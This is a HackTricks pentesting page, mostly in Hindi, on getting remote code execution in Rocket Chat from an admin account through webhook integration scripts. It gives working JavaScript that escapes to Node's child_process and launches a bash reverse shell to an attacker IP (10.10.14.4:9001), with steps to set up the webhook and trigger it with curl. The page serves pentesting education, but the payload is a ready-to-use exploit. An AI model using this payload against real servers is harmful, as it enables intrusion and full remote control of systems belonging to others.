Rocket Chat

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Websec | Uw Cybersecurity Specialist

RCE

यदि आप Rocket Chat के अंदर व्यवस्थापक हैं तो आप RCE प्राप्त कर सकते हैं।

Integrations पर जाएं और New Integration चुनें और कोई भी चुनें: Incoming WebHook या Outgoing WebHook।
/admin/integrations/incoming

docs के अनुसार, दोनों ES2015 / ECMAScript 6 (बुनियादी रूप से JavaScript) का उपयोग डेटा को संसाधित करने के लिए करते हैं। तो चलिए एक rev shell for javascript प्राप्त करते हैं जैसे:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

WebHook कॉन्फ़िगर करें (चैनल और पोस्ट के रूप में उपयोगकर्ता नाम होना चाहिए):

WebHook स्क्रिप्ट कॉन्फ़िगर करें:

परिवर्तनों को सहेजें
उत्पन्न WebHook URL प्राप्त करें:

इसे curl के साथ कॉल करें और आपको rev shell प्राप्त होना चाहिए

Websec | Uw Cybersecurity Specialist

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

सदस्यता योजनाएँ जांचें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करें।

PreviousPython NextSpecial HTTP headers

Last updated 7 days ago